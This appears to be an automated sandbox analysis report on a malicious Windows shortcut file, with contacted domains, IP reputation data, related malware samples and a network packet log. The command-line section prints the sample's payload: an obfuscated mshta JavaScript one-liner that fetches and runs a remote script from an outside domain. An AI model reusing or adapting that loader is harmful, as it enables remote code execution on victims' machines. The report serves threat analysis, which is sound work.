https://sentry.io | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://mobile.twitter.com | 00000003.2108869400.000002A68F313000, 00000003.2112704093.000002A68F311000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://ton-staging.pdxa.x.com | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://vmaprel.snappytv.com | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://www.twitter.com | 00000003.2096343502.000002A68F318000, 00000003.2112704093.000002A68F318000, 00000002.2114187780.000002A68F318000, 00000002.2114187780.000002A68F343000, 00000003.2112704093.000002A68F343000, 00000003.2110781006.000002A68F343000, 00000003.2108869400.000002A68F318000, 00000003.2110781006.000002A68F318000 | false | - | high
https://flinanmansal.roupagucci.sbs/ | 00000003.2109022379.0000029E8CE9D000, 00000003.2111510367.0000029E8CE9A000, 00000002.2113657541.0000029E8CE9B000, 00000003.2111196582.0000029E8CE92000 | false | Avira URL Cloud: safe | unknown
https://dwo3ckksxlb0v.cloudfront.net; | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | Avira URL Cloud: safe | low
https://ton-staging.atla.twitter.com | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://www.twitter.com/x | 00000003.2096343502.000002A68F343000, 00000003.2108869400.000002A68F343000, 00000002.2114187780.000002A68F343000, 00000003.2112704093.000002A68F343000, 00000003.2110781006.000002A68F343000 | false | - | high
https://t.co/1/i/adsct; | 00000003.2108869400.000002A68F313000, 00000003.2108869400.000002A68F371000, 00000003.2108824952.000002A68F379000 | false | - | high
https://business.twitter.com/en/help/troubleshooting/how-twitter-ads-work.html?ref=web-twc-ao-gbl-ad | 00000003.2108824952.000002A68F372000 | false
                                                                                          high
                                                                                          https://pdhdsnappytv-vh.akamaihd.netmshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.twitter.com(mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F318000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            low
                                                                                            HTtps://flinanmansal.roupagucci.sbs/?1/mshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112009127.000002A68F0DD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://dwo3ckksxlb0v.cloudfront.netmshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://flinanmansal.roupagucci.sbs/?1/9?smshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://scontent.xx.fbcdn.netmshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://localhost.x.com:3443;mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                https://media.tenor.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://prod-periscope-profile.s3-us-west-2.amazonaws.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://legal.twitter.com/imprint.htmlmshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://prod-periscope-profile.s1mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://flinanmansal.roupagucci.sbs/?1/??umshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://aa.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://platform-lookaside.fbsbx.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://analytics.x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • 0%, Virustotal, Browse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://caps.twitter.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://twitter.com/tosmshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://abs.twimg.com/errors/logo46x38mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://aa.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • 0%, Virustotal, Browse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://flinanmansal.roupagucci.sbs/?1/Ztumshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://mpdhdsnappytv-vh.akamaihd.netmshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://api-stream.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://mobile.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://ton-staging.atla.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.google.com/recaptcha/mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://ads-api.x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://ads-api.twitter.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://help.twitter.com/using-twitter/twitter-supported-browsersmshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://abs.twimg.com/errors/logo46x38.pngmshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://scontent-sea1-1.xx.fbcdn.netmshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://mdhdsnappytv-vh.akamaihd.netmshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://caps.x.commshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://api.x.commshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://client-api.arkoselabs.com/mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • 0%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
IP             Domain                       Country        ASN    ASN Name         Malicious
104.244.42.65  twitter.com                  United States  13414  TWITTERUS        false
104.21.29.223  flinanmansal.roupagucci.sbs  United States  13335  CLOUDFLARENETUS  false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431784
Start date and time: 2024-04-25 19:21:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ProconGO1121082800.LnK.lnk
Detection: MAL
Classification: mal52.winLNK@4/0@3/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 1
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 5224 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
104.244.42.65 | wDeGiI6U9u.exe | Get hash | malicious | Gurcu Stealer | Browse | twitter.com/UVE4rzhe8O?12=1
 | https://cutt.us/oPNMU?imp | Get hash | malicious | Unknown | Browse | twitter.com/cuturl
 | http://www.secured-mailsharepoint.online/ | Get hash | malicious | Unknown | Browse | twitter.com/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
twitter.com | http://94.156.79.129/x86_64 | Get hash | malicious | Unknown | Browse | 104.244.42.65
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | o3KyzpE7F4.ps1 | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 172.67.74.152
 | http://www.mh3solaroh.com/ | Get hash | malicious | HTMLPhisher | Browse | 104.17.246.203
 | https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== | Get hash | malicious | HTMLPhisher | Browse | 172.67.69.226
 | https://www.jottacloud.com/s/3542495a6cd3d7a4aafad5878d671fdee68 | Get hash | malicious | Unknown | Browse | 162.159.152.4
 | http://email.wantyourfeedback.com/ls/click?upn=u001.PD4nPnyJUo8oiEzSkSGLgaBNAMtLp9U5nstWElDmnpXtySPOXSs4GxXhEZNYegDWlOpy_1gt1aDjd5mPVItYgazWgABkVm-2FZUH6kt1lIvkdtkRWsfoyQV18ixDvOX-2B0tU4ZH6SMN7PC0YJjM3gcvFPvh6CbZuFXlOBXf3FWLiJkpKJ7Hjba3S4-2FzhpmkR8VdprfK8GO3qSu-2BzqpIaLLC-2Bva9kOn7HY5B7OIgz5EOl88o1lnRSRpayTzqRzTSFhtg2Bi-2BI4dAZ7qHRbJ3vb9lcrxBKqAk13I-2BCAvndhSK1Vi4ubCjlp2xQlrXIHfzqmLiSPjl7tEmTsLYr99h3esBOPv8ASLIpf873P512I7xYEOjogT1gQCerfZNqh6K2IdWU6lDJ2r3wpU6ug02vU9Zslw4DYpuNNZQNVtap5mqv9Xf8D1PYQxYI5BK4owXOV2wEXeRIjST24XAw6EO9D1tdiGoHDRaxW2QofayefCuiW9Z191aML90svJWojHiQp1Fq-2BXFLiyEx8V1eLa7dixfJ23RRWtHvg1jOrHp7lqvXRA7dobs-3D | Get hash | malicious | HTMLPhisher | Browse | 172.67.223.170
 | file.exe | Get hash | malicious | LummaC | Browse | 104.21.16.225
 | http://wsj.pm | Get hash | malicious | NetSupport RAT | Browse | 104.26.0.231
 | https://rro5wktwxr4n.rollout-specialist-assistance-network.cfd/support_case_ID/#8347435238 | Get hash | malicious | Unknown | Browse | 172.67.222.163
 | https://web.lehighvalleychamber.org/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=5337&ListingID=4065&CategoryID=74&SubCategoryID=0&url=//sanemedia.ca/owaow/yjyo8q/bWFyaWEud29qY2llY2hvd3NraUBjby5tb25tb3V0aC5uai51cw== | Get hash | malicious | HTMLPhisher | Browse | 104.21.17.5
 | file.exe | Get hash | malicious | Clipboard Hijacker, RisePro Stealer | Browse | 104.26.5.15
TWITTERUS | https://runrun.it/share/portal/x1pWDYC5l2f72kuw | Get hash | malicious | HTMLPhisher | Browse | 104.244.42.194
 | https://starmicronics.com/support/download/starprnt-intelligence-software-setup-exe-file-v3-6-0a/#unlock | Get hash | malicious | Unknown | Browse | 104.244.42.195
 | https://cos-aliyun8789.towqzg.cn/ | Get hash | malicious | Unknown | Browse | 104.244.42.67
 | http://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.html | Get hash | malicious | HTMLPhisher | Browse | 104.244.42.131
 | https://jiujiuwanka.cn/ | Get hash | malicious | Unknown | Browse | 104.244.42.3
 | https://goxdgdb.cn/ | Get hash | malicious | Unknown | Browse | 104.244.42.195
 | https://x9mihc.cn/ | Get hash | malicious | Unknown | Browse | 104.244.42.3
 | https://zgmskjr.cn/ | Get hash | malicious | Unknown | Browse | 104.244.42.67
 | http://keeper.com | Get hash | malicious | Unknown | Browse | 104.244.42.136
 | https://in.xero.com/VmFUGq2DR0w0RroiyvWAWXw083jyp1tZyI3WNgUe?utm_source=invoiceEmailViewInvoiceButtonSecondary&utm_campaign=invoicesEmailStandardV2 | Get hash | malicious | Unknown | Browse | 104.244.42.5
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | file.exe | Get hash | malicious | Clipboard Hijacker, RisePro Stealer | Browse | 104.244.42.65, 104.21.29.223
 | Version.125.7599.75.js | Get hash | malicious | SocGholish | Browse | 104.244.42.65, 104.21.29.223
 | Database4.exe | Get hash | malicious | Unknown | Browse | 104.244.42.65, 104.21.29.223
 | lzShU2RYJa.exe | Get hash | malicious | Babuk, Clipboard Hijacker, Djvu, Vidar | Browse | 104.244.42.65, 104.21.29.223
 | XV9q6mY4DI.exe | Get hash | malicious | Babuk, Djvu | Browse | 104.244.42.65, 104.21.29.223
 | n8XBpFdVFU.exe | Get hash | malicious | Babuk, Djvu, Vidar | Browse | 104.244.42.65, 104.21.29.223
 | R5391762lf.exe | Get hash | malicious | Clipboard Hijacker, Djvu, Vidar | Browse | 104.244.42.65, 104.21.29.223
 | Swift Payment.bat | Get hash | malicious | AgentTesla, GuLoader | Browse | 104.244.42.65, 104.21.29.223
 | file.exe | Get hash | malicious | Vidar | Browse | 104.244.42.65, 104.21.29.223
 | mU2p71KMss.exe | Get hash | malicious | Babuk, Djvu | Browse | 104.244.42.65, 104.21.29.223
No context
No created / dropped files found
File type: MS Windows shortcut, Item id list present, Has command line arguments, Archive, ctime=*Invalid time*, mtime=*Invalid time*, atime=*Invalid time*, length=626328371, window=hidenormalshowminimized
Entropy (8bit): 7.99696051348932
TrID:
• Windows Shortcut (20020/1) 100.00%
File name: ProconGO1121082800.LnK.lnk
File size: 68'063 bytes
MD5: 3849799c2978740cc3e27cc3ec5980c5
SHA1: 6dfe666bdc1e961d29d56fb9754ed24590b43c8f
SHA256: a1bda78309cd02e62af859fe5171b65baa9b34861088e8c9fede648d4ef0fca4
SHA512: 8d9939c5dbe6cacaa8087335bb228e7e32e43b52eb38ee7165af42eec30e7319cc8d19e431b5125db1d74831d6844428abd2f0c1e889acfbe52efecda7d74a6a
SSDEEP: 1536:UCmxmP2rmBjJW4RhWc/GE9jAI78DmYpWMO5h3VJdA8prI2s9vM7CKNK4:OxtrmBj7yIG8Ao8DTsh3VJdA8prtEsl1
TLSH: 8A63F185A45A1AFAC9F5E9FEE5DB4806722314C6A6DF15947BD4BF09888241C130933E
File Content Preview: L..................F!... ...JQ..)..3JQ..)..3JQ..)..33.U%....................Y....P.O. .:i.....+00.../C:\......................'.2...........Windows\System32\cmd.exe...6./c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160
Icon Hash: b0ef3ac32d2dadad

General

Relative Path:
Command Line Argument: /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
Icon location:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 25, 2024 19:21:55.208003044 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:55.208059072 CEST | 443 | 49699 | 104.21.29.223 | 192.168.2.6
Apr 25, 2024 19:21:55.208131075 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:55.216787100 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:55.216799974 CEST | 443 | 49699 | 104.21.29.223 | 192.168.2.6
Apr 25, 2024 19:21:55.463450909 CEST | 443 | 49699 | 104.21.29.223 | 192.168.2.6
Apr 25, 2024 19:21:55.463526964 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:55.547394037 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:55.547426939 CEST | 443 | 49699 | 104.21.29.223 | 192.168.2.6
Apr 25, 2024 19:21:55.548449993 CEST | 443 | 49699 | 104.21.29.223 | 192.168.2.6
Apr 25, 2024 19:21:55.548530102 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:55.551017046 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:55.596126080 CEST | 443 | 49699 | 104.21.29.223 | 192.168.2.6
Apr 25, 2024 19:21:57.088413954 CEST | 443 | 49699 | 104.21.29.223 | 192.168.2.6
Apr 25, 2024 19:21:57.088493109 CEST | 443 | 49699 | 104.21.29.223 | 192.168.2.6
Apr 25, 2024 19:21:57.088555098 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:57.088577986 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:57.091650009 CEST | 49699 | 443 | 192.168.2.6 | 104.21.29.223
Apr 25, 2024 19:21:57.091666937 CEST | 443 | 49699 | 104.21.29.223 | 192.168.2.6
Apr 25, 2024 19:21:57.224684954 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.224766016 CEST | 443 | 49700 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.224884033 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.225601912 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.225635052 CEST | 443 | 49700 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.462229967 CEST | 443 | 49700 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.462316990 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.469245911 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.469259024 CEST | 443 | 49700 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.469682932 CEST | 443 | 49700 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.469749928 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.470129013 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.512139082 CEST | 443 | 49700 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.714561939 CEST | 443 | 49700 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.714693069 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.714704990 CEST | 443 | 49700 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.714771986 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.714860916 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.714895964 CEST | 443 | 49700 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.714921951 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.714963913 CEST | 49700 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.829453945 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.829488039 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:57.829580069 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.829889059 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:57.829909086 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.060909033 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.061126947 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:58.064378023 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:58.064385891 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.064707994 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.064820051 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:58.065148115 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:58.108146906 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.330760956 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.330796003 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.330851078 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.330873966 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:58.330893993 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.330905914 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Apr 25, 2024 19:21:58.330923080 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:58.331036091 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:58.332998991 CEST | 49701 | 443 | 192.168.2.6 | 104.244.42.65
Apr 25, 2024 19:21:58.333009005 CEST | 443 | 49701 | 104.244.42.65 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
